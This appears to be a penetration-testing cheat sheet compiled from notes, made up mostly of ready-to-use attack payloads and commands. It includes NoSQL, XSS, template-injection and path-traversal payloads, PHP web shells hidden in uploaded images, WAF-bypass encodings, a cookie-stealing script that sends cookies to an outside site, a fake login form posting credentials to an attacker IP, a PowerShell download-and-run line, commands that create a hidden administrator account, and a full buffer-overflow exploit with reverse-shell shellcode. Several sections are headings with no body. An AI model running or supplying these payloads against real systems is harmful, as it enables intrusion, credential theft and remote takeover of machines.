wfuzz -z file,/usr/share/wordlists/rockyou.txt -d "uname=FUZZ&pass=FUZZ"  --hc 302 http://0.0.0.0/userinfo.php

# find config files : 
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null

# (system user account information)
/etc/passwd
/etc/shadow
# (MySQL configuration)
/etc/my.cnf
/etc/mysql/my.cnf
~/.my.cnf
/etc/mysql/conf.d/
/etc/mysql/mysql.conf.d/
/var/lib/mysql/mysql/user.MYD
# (PostgreSQL configuration)
/var/lib/pgsql/data/postgresql.conf 
pg_hba.conf
pg_ident.conf
# (web server configuration)
/etc/httpd/conf/httpd.conf
/etc/nginx/nginx.conf 
/var/apache2/config.inc
# (SSH server configuration)
/etc/ssh/sshd_config
# (Web Server configuration)
/etc/httpd/conf/*
/etc/nginx/*
# (Tomcat configuration)
tomcat-users.xml
find / -name 'tomcat-users.xml'

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1

# change to :

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://localhost/admin

# Similar to admin'--
# Ignores the password input
Instructing MongoDB to find a document (user) with a username equal to **admin** and his password is not equal to **xyz**, which turns this statement to TRUE because the admin's password is not xyz.

 http://example.thm.labs/search?username=admin&role[$ne]=user
 http://example.thm.labs/search?username=ben&role=user
 http://example.thm.labs/search?username[$ne]=ben&role=user
 
# On Login pages / search bars
admin' || 'a'=='a

true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1

HTML | XSS

XSS

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Types

Stored XSS

The injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information.

Reflected XSS

Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request.

Explanations

Let’s say a web page has a search box, which displays the search text alongside the search results as follows : Your search results for “searchtext”:

The web page also uses the HTTP GET request method to embed the user’s input data to the query string of the URL as follows: https://example.com/action.php?query=searchtext

If the search box is susceptible to a non-persistent XSS attack, a cybercriminal can send a malicious link to an unsuspecting user and exploit the vulnerability. This is how the script-injected link could look like:

DOM XSS

DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner.

That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.

Let’s take the following example of a web page that utilizes JavaScript to manipulate a DOM element:

As you can see on the code snippet above, the value from a user input field is grabbed and appended to an element within the web page’s HTML. If an attacker can control this value, they can craft a devious value that forces their own code to be executed.

Here is an example :

Your search results for: “<script>document.location=’https://xssattacksite.com/log.php?c=’ + document.cookie</script>”

Payloads

Examples

N.B.

alert() print()

Use print instead of alert

Beef

Install & Config

Control

Mitigations

Developers should implement a whitelist of allowable inputs, and if not possible then there should be some input validations and the data entered by the user must be filtered as much as possible.
Output encoding is the most reliable solution to combat XSS i.e. it takes up the script code and thus converts it into the plain text.
A WAF (Web Application Firewall) should be implemented as it somewhere protects the application from XSS attacks.

HTML Injection

Check

Form fields
- Exploit with BurpSuite using URL Encode

Payloads

Mitigations

The developer should set up his HTML script which filters the meta-characters from user inputs.
The developer should implement functions to validate the user inputs such that they do not contain any specific tag that can lead to virtual defacement.

# Change :
# Content-Disposition: form-data; name="avatar"; filename="secrets.php"
# to
# Content-Disposition: form-data; name="avatar"; filename="../secrets.php"

# You can encode "../" as :
    %2e%2e%2f
    %252e%252e%252f
    ..%c0%af
    ..%ef%bc%8f
# Then access the file with LFI :
# GET /files/avatars/../secrets.php

# First, upload a malicious .htaccess :
# Content-Disposition: form-data; name="avatar"; filename=".htaccess"
# Content-Type: text/plain

# AddType application/x-httpd-php .l33t

# Then upload the php file with .l33t extention
# Content-Disposition: form-data; name="avatar"; filename="secrets.l33t"
# Content-Type: application/x-php

<?php echo file_get_contents('/home/carlos/secret'); ?>
# or
<?php system($_GET['cmd']); ?>

# You can add :
GIF89a; // at the beginning of the php file or in the burp request

# Burp request
# Content-Disposition: form-data; name="avatar"; filename="secrets.php"
# Content-Type: application/x-php

# GIF89a at the beginning of the php command
GIF89a;<?php echo file_get_contents('/home/carlos/secret'); ?>
# OR
GIF89a;<?php system($_GET['cmd']); ?>

# example 1
exiftool -Comment="<?php echo 'START ' . 
file_get_contents('/home/carlos/secret') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php

# example 2
exiftool -Comment="<?php echo 'START ' . 
system($_GET['cmd']); . ' END'; ?>" $input.jpg -o polyglot.php

git clone https://github.com/sAjibuu/upload_bypass.git
cd upload_bypass/
pip3 install -r requirements.txt

python3 ext_bypass.py -u $url -e $extension-file -a $allowed-extension -s $success-msg --location $path-of-uploaded-file

# enum4linux
# default
enum4linux $ip
# runs all options
enum4linux -a $ip
# If you've obtained credentials => pull a full list of users regardless of the RestrictAnonymous option
enum4linux -u '$user' -p '$pass' -a $ip


# nmap
# enumerate smb shares, brute, get infos
nmap --script 'smb-enum-shares,smb-os-discovery,smb-brute,smb-system-info,smb-vuln*' -p 139,445 $ip


# netexec
# only in upgraded Windows servers from 2003 - No auth attempt
# Enumerate user shares anonymously
nxc smb $domainOrIP -u '' -p '' --shares
# to get password policy, minimum length, account lockout threshold
nxc smb $domainOrIP --pass-pol -u '' -p ''	
# The usernames with RID greater than 1000 into a username file
nxc smb $domainOrIP -u robot -p '' --rid-brute | grep SidTypeUser	


# smbmap
python3 smbmap.py --host-file smb-hosts.txt -d $domain -L

# Default Output
smbmap.py -H 0.0.0.0 -u administrator -p asdf1234

# Default Output, with NTML hash
smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 0.0.0.0

# Command execution
smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x 'net group "Domain Admins" /domain' -H 0.0.0.0

-------------------------------------------------------------------
Polyglot:
${{<%[%'"}}%\

-------------------------------------------------------------------
FreeMarker (Java):
${7*7} = 49
<#assign command="freemarker.template.utility.Execute"?new()> ${ command("cat /etc/passwd") }
--------------------------------------------------------------------
(Java):
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
${T(java.lang.System).getenv()}
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(" ")}
--------------------------------------------------------------------
Twig (PHP):
{{7*7}}
{{7*'7'}}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
--------------------------------------------------------------------
Smarty (PHP):
{$smarty.version}
{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
-------------------------------------------------------------------
Handlebars (NodeJS):
wrtz{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').exec('whoami');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
-------------------------------------------------------------------
Velocity:
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
-------------------------------------------------------------------
ERB (Ruby):
<%= system("whoami") %>
<%= Dir.entries('/') %>
<%= File.open('/example/arbitrary-file').read %>
-------------------------------------------------------------------
Django Tricks (Python):
{% debug %}
{{settings.SECRET_KEY}}
--------------------------------------------------------------------
Tornado (Python):
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
--------------------------------------------------------------------
Mojolicious (Perl):
<%= perl code %>
<% perl code %>
-------------------------------------------------------------------
Flask/Jinja2: Identify:
{{ '7'*7 }}
{{ [].class.base.subclasses() }} # get all classes
{{''.class.mro()[1].subclasses()}}
{%for c in [1,2,3] %}{{c,c,c}}{% endfor %}


-------------------------------------------------------------------
Flask/Jinja2: 
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
--------------------------------------------------------------------
Jade:
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
--------------------------------------------------------------------
Razor (.Net):
@(1+2)
@{// C# code}
--------------------------------------------------------------------
ASP:
<%response.write(date())%>.
<% Response.Write("testing execution") %>
<%="testing execution" %>

# with zmap
sudo zmap -i $iface -P 2 --probe-module=icmp_echoscan -B 1M --max-targets=10000000 -o targets_rfc1918.txt $network_ips

# with arp-scan
arp-scan -d $networkrange

# with nxc - smb, ssh, rdp
nxc smb $networkrange

# test for dns attacks
dnsenum $domain -f /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt --dnsserver $dns_server_ip > dnsenum.txt

# discover printers, web, shares, vpn, media
gobuster dns -d $domain -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt

# LINUX HOST
# no auth
# netexec
nxc smb $ip -u anonymous -p "" --rid-brute 10000

# kerbrute
kerbrute -domain $domain -dc-ip $ip -users /tools/payloads/SecLists/Usernames/xato-net-10-million-usernames.txt

# WINDOWS HOST
GetADUsers.py $domain/ -dc-ip $ip

# Get all of the OUs in a domain
Get-ADOrganizationalUnit -Filter 'Name -like "*"' | Format-Table Name, DistinguishedName -A

### Create a new user in admin groupe 

# username:password = anon:p3nT3st!
net user anon p3nT3st! /add
net localgroup administrators anon /add

net user anon p3nT3st! /add;net localgroup administrators anon /add

If you cannot import module start a webserver and
IEX(New-Object Net.Webclient).downloadstring('http://<IP>/Powershell.ps1')

/**
* Get the filename from a GET input
* Example - http://example.com/?file=filename.php
*/
$file = $_GET['file'];

/**
* Unsafely include the file
* Example - filename.php
*/
include('directory/' . $file);

http://example.com/index.php?page=../../../etc/passwd
http://example.thm.labs/page.php?file=/etc/passwd 

# NULL BYTE
http://example.thm.labs/page.php?file=../../../../../../etc/passwd%00 

# FILTER BYPASS TRICKS
http://example.com/index.php?page=....//....//etc/passwd
http://example.thm.labs/page.php?file=....//....//....//....//etc/passwd 
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd

# DOUBLE ENCODING
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

# UTF-8 ENCODING
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00

http://example.com/page.php?file=php://filter/resource=/etc/passwd

http://example.com/page.php?file=php://filter/read=string.rot13/resource=/etc/passwd

http://example.com/page.php?file=php://filter/convert.base64-encode/resource=/etc/passwd

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=

root@kali:~# telnet 10.10.10.10. 25
Trying 10.10.10.10....
Connected to 10.10.10.10..
Escape character is '^]'.
220 straylight ESMTP Postfix (Debian/GNU)
helo ok
250 straylight
mail from: [email protected]
250 2.1.0 Ok
rcpt to: root
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
subject: <?php echo system($_GET["cmd"]); ?>
data2
.

nsupdate
> server $ip_target $port_dns_target
> key $key_algorithm:$name_key $secret
> zone $dns_name
> update add mail.$target_domain 86400 A $ip_host
> send

# start python smtpd server to receive mail
python3 -m smtpd -c DebuggingServer -n $ip_host:25

let searchText = document.getElementById(‘searchText’).value;
let resultsData = document.getElementById(‘resultsData’);
resultsData.innerHTML = ‘Your search results for: ‘ + searchText;

<!-- put this into a form field or search bar-->
<img src=q onError=prompt('!XSS!'); />
<script>alert("!XSS!")</script>
<script>print()</script>

<!-- encoded -->
%uff1cscript%uff1eprompt("!XSS!");%uff1c/script%uff1e&
%253Cscript%253Eprint()%253C%252Fscript%253E
%253Cimg%2520src%253Dq%2520onError%253Dalert(%2522XSS%2522)%253B%2520%252F%253E

<!-- Bypassing First Filter -->
<svg/onload=alert(1)>
<svg//////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<svg%09onload=alert(1)>
<svg onload%09=alert(1)>
<svg%09onload%20=alert(1)>
<svg onload%09%20%28%2C%3B=alert(1)>
<svg onload+0B=alert(1)>
<script>\u0061lert(1)</script>
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<img src=x onerror="\u0061lert"/>
<img src=x onerror="eval('\141lert(1)')"/>
<img src=x onerror="eval('\x61lert(1)')"/>

 <!-- Javascript Keyword is blocked-->
<object data="JaVaScRiPt:alert(1)">
<object data="javascript&colon;alert(1)">
<object data="java  
    script:alert(1)">
<object data="javascript&#x003A;alert(1)">
<object data="javascript&#58;alert(1)">
<object data="&#x6A;avascript;alert(1)">
<object data="&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;74;&#x3A;alert(1)">
<object data="data:text/html,<script>alert(1)</script>">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">

<!-- URL ENCODE THESE & put them in a form field -->
<b>test</b>
<a href="https://google.com">test</a>
<img src= "https://www.ignitetechnologies.in/img/logo-blue-white.png">

<!-- add a form field to website -->
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index:1000; background-color:white; padding:1em;">Please login with valid 
credentials:<br><form name="login" action="http://192.168.0.7:4444/login.htm">
<table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td>
<td><input type="text" name="password"/></td></tr><tr>
<td colspan=2 align=center><input type="submit" value="Login"/></td></tr>
</table></form>

{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}

# url encoded
fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}

# full
fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}
fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}
fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}

query IntrospectionQuery {
  __schema {
    queryType {
      name
    }
    mutationType {
      name
    }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}

# install
git clone https://github.com/mazen160/server-status_PWN.git
cd server-status_PWN
pip3 install -r requirements

# exploit
python3 server-status_PWN.py --url 'http://$target/server-status'

Exploits

Take Control of EIP

One of the most important aspects of a stack-based buffer overflow is to get the instruction pointer (EIP) under control, so we can tell it to which address it should jump. This will make the EIP point to the address where our shellcode starts and causes the CPU to execute it.

Determine the Offset

The offset is used to determine how many bytes are needed to overwrite the buffer and how much space we have around our shellcode.

Create pattern

Shellcode is a program code that contains instructions for an operation that we want the CPU to perform. The manual creation of the shellcode will be discussed in more detail in other modules. But to save some time first, we use the Metasploit Framework (MSF) that offers a Ruby script called “pattern_create” that can help us determine the exact number of bytes to reach the EIP. It creates a unique string based on the length of bytes you specify to help determine the offset.

If we now use precisely this number of bytes for our "U"s, we should land exactly on the EIP. To overwrite it and check if we have reached it as planned, we can add 4 more bytes with "\x66" and execute it to ensure we control the EIP.

The EIP has been overwritten with our \x66 characters.

Next, we have to find out how much space we have for our shellcode, which then executes the commands we intend. As we control the EIP now, we will later overwrite it with the address pointing to our shellcode's beginning.

Examine the register and find the address of EBP

Determine the Length for Shellcode

We have to find out approximately how big our shellcode will be that we will insert, and for this, we will use msfvenom.

Shellcode length

We need a total of 1040 bytes to get to the EIP.
Here, we can use an additional 100 bytes of NOPs
150 bytes for our shellcode.

Buffer

Now we can try to find out how much space we have available to insert our shellcode.

Identification of Bad Characters

Here we use the following character list to find out all characters we have to consider and to avoid when generating our shellcode.

We need to calculate our buffer again.

Look at the whole main function to set a breakpoint at the corresponding function so that the execution stops at this point and we can analyze the memory's content :

Generate shellcode

msfvenom

# blocked by waf
<Svg/x=">"/OnLoAD=confirm()//
# bypassed
%3CSvg%2Fx%3D%22%3E%22%2FOnLoAD%3Dconfirm%28%29%2F%2F

# blocked by waf
UniOn(SeLeCt 1,2,3,4,5,6,7,8,9,10)
# bypassed
UniOn%28SeLeCt+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%29

# url example
https://example.com/page.php?id=1%252f%252a*/UNION%252f%252a /SELECT

# basic request
<marquee onstart=prompt()>

# obfuscated
<marquee onstart=\u0070r\u06f\u006dpt()>

# blocked by waf
/?redir=http://google.com

# bypassed
/?redir=http://google。com (Unicode alternative)

# blocked by waf
<marquee loop=1 onfinish=alert()>x

# bypassed
＜marquee loop＝1 onfinish＝alert︵1)>x (Unicode alternative)

# basic request
../../etc/shadow

# obfuscated
%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFshadow

# blocked by waf
<script>confirm()</script>

# bypassed
<!--><script>confirm/**/()/**/</script>

# blocked by waf
/?id=1+union+select+1,2--

# bypassed
/?id=1+un/**/ion+sel/**/ect+1,2--

# url example
index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4'union%a0select pass from users#

index.php?page_id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3

# basic request
http://example/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\

# obfuscated payload
http://example/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\

# basic payload
<script>confirm()</script>

# obfuscated payload
%253Cscript%253Econfirm()%253C%252Fscript%253E

# basic request
/bin/cat /etc/passwd

# obfuscated payload
/???/??t /???/??ss??

# used chars
/ ? t s

# basic request
/bin/nc 127.0.0.1 443

# obfuscated payload
/???/n? 2130706433 443

# used chars
/ ? n [0-9]

# basic request
<script>confirm()</script>

# obfuscated payload
<script>+-+-1-+-+confirm()</script>

# basic request
<BODY onload=confirm()>

# obfuscated payload
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>

# basic request
<a href=javascript;alert()>ClickMe

# bypassed technique
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

# check what infos you can see
wireshark

# nmap
# BEST - https://miloserdov.org/?p=5248
# discover
sudo nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oX nmap_output.xml $network_ip
# extract the hosts
grep -A 2 'up' nmap_output.xml | grep -E -o '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > hosts.txt
# scan them, find routers
sudo nmap -v -PE -n --min-hostgroup 1024 --min-parallelism 1024 -p 80,443,8080,1080 --open -iL hosts.txt -oX nmap_routers.xml

# OTHERS
# Ping discovery, Top 20, fragment packets, no DNS resolution
nmap -v --top-ports 20 $ip/24 -f -n --open -oA
# Ping discovery, Top 200, fragment packets, no DNS resolution, service version
nmap -v --top-ports 200 $ip/24 -f -n -sV --open -oA
# Top 1000, fragment packets, no DNS resolution, service version, all alive (no ping)
nmap -v --top-ports 1000 $ip/24 -f -n -sV -Pn --open -oA

❯ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1200 > pattern.txt
cat pattern.txt
Aa0Aa1Aa2Aa3Aa4Aa5...<SNIP>...Bn6Bn7Bn8Bn9

# GDB using the generated payload
(gdb) run $(python -c "print 'Aa0Aa1Aa2Aa3Aa4Aa5...<SNIP>...Bn6Bn7Bn8Bn9'") 
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/student/bow/bow32 $(python -c "print 'Aa0Aa1Aa2Aa3Aa4Aa5...<SNIP>...Bn6Bn7Bn8Bn9'")
Program received signal SIGSEGV, Segmentation fault.
0x69423569 in ?? ()

# GDB - EIP
(gdb) info registers eip
eip            0x69423569	0x69423569

# CALCULATING THE OFFSET
# We see that the EIP displays a different memory address, and we can use another MSF tool called "pattern_offset" to calculate the exact number of characters (offset) needed to advance to the EIP.
❯ /usr/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb -q 0x69423569
[*] Exact match at offset 1036

(gdb) run $(python -c "print '\x55' * 1036 + '\x66' * 4")

The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/student/bow/bow32 $(python -c "print '\x55' * 1036 + '\x66' * 4")
Program received signal SIGSEGV, Segmentation fault.
0x66666666 in ?? ()

# characters list

CHARS="\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

# string length
echo $CHARS | sed 's/\\x/ /g' | wc -w
256

(gdb) disas main

# setting the breakpoint at the function
(gdb) break bowfunc

# send chars
(gdb) run $(python -c 'print "\x55" * (1040 - 256 - 4) + "\x00\x01\x02\x03\x04\x05...<SNIP>...\xfc\xfd\xfe\xff" + "\x66" * 4')

# look at the stack
(gdb) x/2000xb $esp+500

# identify all bad characters - look where the chars start
# adjust the number of chars from the one who are bad
# Substract the number of removed characters

# Buffer = "\x55" * (1040 - 255 - 4) = 781
# "\x00" removed: 256 - 1 = 255 bytes
# CHARS = "\x01\x02\x03...<SNIP>...\xfd\xfe\xff"
# EIP = "\x66" * 4

# send without the null byte
(gdb) run $(python -c 'print "\x55" * (1040 - 255 - 4) + "\x01\x02\x03\x04\x05...<SNIP>...\xfc\xfd\xfe\xff" + "\x66" * 4')

# the stack
x/2000xb $esp+550

# check for other bad chars ... etc

# syntahx
msfvenom -p linux/x86/shell_reverse_tcp lhost=<LHOST> lport=<LPORT> --format c --arch x86 --platform linux --bad-chars "<chars>" --out <filename>

# real command
msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=31337 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out shellcode

# content of shellcode
❯ cat shellcode
unsigned char buf[] = 
"\xbe\x6e\x05\xb5\x18\xdd\xc1\xd9\x74\x24\xf4\x5a\x31\xc9"
"\xb1\x12\x31\x72\x12\x03\x72\x12\x83\x84\xf9\x57\xed\x69"
"\xd9\x6f\xed\xda\x9e\xdc\x98\xde\xa9\x02\xec\xb8\x64\x44"
"\x9e\x1d\xc7\x7a\x6c\x1d\x6e\xfc\x97\x75\x0e\xfe\x67\x84"
"\x98\xfc\x67\xfc\x31\x88\x89\xb0\xa4\xda\x18\xe3\x9b\xd8"
"\x13\xe2\x11\x5e\x71\x8c\xc7\x70\x05\x24\x70\xa0\xc6\xd6"
"\xe9\x37\xfb\x44\xb9\xce\x1d\xd8\x36\x1c\x5d";

# Now that we have our shellcode, we adjust it to have only one string, and then we can adapt and submit our simple exploit again.

# Buffer = "\x55" * (1040 - 124 - 95 - 4) = 817
# NOPs = "\x90" * 124
# Shellcode = "\xda\xca\xba\xe4\x11...<SNIP>...\x5a\x22\xa2"
# EIP = "\x66" * 4'

# EXPLOIT
(gdb) run $(python -c 'print "\x55" * (1040 - 124 - 95 - 4) + "\x90" * 124 + ""\xbe\x6e\x05\xb5\x18\xdd\xc1\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x12\x31\x72\x12\x03\x72\x12\x83\x84\xf9\x57\xed\x69\xd9\x6f\xed\xda\x9e\xdc\x98\xde\xa9\x02\xec\xb8\x64\x44\x9e\x1d\xc7\x7a\x6c\x1d\x6e\xfc\x97\x75\x0e\xfe\x67\x84\x98\xfc\x67\xfc\x31\x88\x89\xb0\xa4\xda\x18\xe3\x9b\xd8\x13\xe2\x11\x5e\x71\x8c\xc7\x70\x05\x24\x70\xa0\xc6\xd6\xe9\x37\xfb\x44\xb9\xce\x1d\xd8\x36\x1c\x5d"" + "\x66" * 4')

# reverse shell 
nc -lvnp 31337

2. Initial Attack Vectors

linWinPwn

linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks. The script uses a number of tools and serves as wrapper of them. Tools include: impacket, bloodhound, crackmapexec, enum4linux-ng, ldapdomaindump, lsassy, smbmap, kerbrute, adidnsdump, certipy, silenthound, and others.

# INSTALL
git clone https://github.com/lefayjey/linWinPwn
cd linWinPwn; chmod +x linWinPwn.sh
chmod +x install.sh
./install.sh
./linWinPwn.sh -h

# USAGE
# on the Windows host, run using PowerShell:
ssh kali@$ip_attacker -R 1080 -NCqf

# On the Linux machine, first update /etc/proxychains4.conf to include socks5 127.0.0.1 1080, then run:
proxychains ./linWinPwn.sh -t $DC_IP

# check sudo version for exploits
